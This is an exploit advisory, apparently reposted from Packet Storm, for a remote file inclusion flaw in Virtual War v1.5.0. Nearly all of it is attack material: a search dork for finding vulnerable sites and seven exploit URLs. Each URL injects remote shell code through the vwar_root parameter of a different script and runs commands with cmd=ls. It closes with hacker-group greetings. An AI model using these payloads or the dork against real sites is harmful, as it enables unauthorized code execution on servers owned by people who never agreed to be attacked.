Virtual War version 1.5.0 suffers from a remote file inclusion vulnerability.
16ac36c876bb77f7e36d94be5d825adbe8a9b77aeabb7d2db84cdfed3ae489aeTitle : Virtual War v1.5.0 Remote File Include (vwar_root)
############################################
Discovered By :::: :::: :::: AG-Spider :::: :::: ::::
-----------------------------------------------------------------------------
Class : Remote file include
Rish : Danger
Application : Virtual War v1.5.0
URL : www.vwar.de
-----------------------------------------------------------------------------
dork : Powered by: Virtual War v1.5.0
Exploit :
https://www.$ite.com/[vwar_path]/war.php?vwar_root=[Shell-code]?&cmd=ls
https://www.$ite.com/[vwar_path]/member.php?vwar_root=[Shell-code]?&cmd=ls
https://www.$ite.com/[vwar_path]/calendar.php?vwar_root=[Shell-code]?&cmd=ls
https://www.$ite.com/[vwar_path]/challenge.php?vwar_root=[Shell-code]?&cmd=ls
https://www.$ite.com/[vwar_path]/joinus.php?vwar_root=[Shell-code]?&cmd=ls
https://www.$ite.com/[vwar_path]news.php?vwar_root=[Shell-code]?&cmd=ls
https://www.$ite.com/[vwar_path]/stats.php?vwar_root=[Shell-code]?&cmd=ls
----------------------------------------------------------------------------
The Arab Warriors Security Team
- - -[T-A-W-S-T] - - -
Muslims Hackers
greetz4: [ Black-Code - KILLERxXx - KaBaRa.HaCk .eGy - CrAsH_oVeR_rIdE]
c0natct us : AG-Spider [ at ] HoTMail.CoM
thx 2 :::::: Lezr.com & 3asfh.net
_________________________________________________________________
Download the new Windows Live Toolbar, including Desktop search!
https://toolbar.live.com/?mkt=en-gb
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed